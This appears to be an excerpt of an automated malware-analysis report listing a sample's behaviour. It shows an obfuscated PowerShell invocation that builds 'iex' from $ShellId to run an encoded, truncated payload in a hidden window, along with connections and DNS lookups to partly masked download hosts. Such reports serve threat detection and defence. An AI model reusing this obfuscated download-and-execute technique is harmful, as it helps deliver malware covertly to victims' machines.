Technical Information
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $sHEllId[1]+$shELliD[13]+'x')(( '122-26}41P36P99P48P59_41>115}49H60_52_59P61H42P126-16>59e42e112G9>59t60_29_50_55P59P48%42_101H122e23>13e52G99t121e54%42_42P46-100-113t113t41%41e41H112}58_63e...
- 'am###jf.com.br':80
- 'hy###dom.org':80
- http://am###jf.com.br/3YrZ/
- http://hy###dom.org/WadY9E/
- DNS ASK da#####e.z-flooring.com
- DNS ASK th###rl24.com
- DNS ASK am###jf.com.br
- DNS ASK hy###dom.org
- DNS ASK cy###-film.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' .( $sHEllId[1]+$shELliD[13]+'x')(( '122-26}41P36P99P48P59_41>115}49H60_52_59P61H42P126-16>59e42e112G9>59t60_29_50_55P59P48%42_101H122e23>13e52G99t121e54%42_42P46-100-113t113t41%41e41H112}58_63e...' (with hidden window)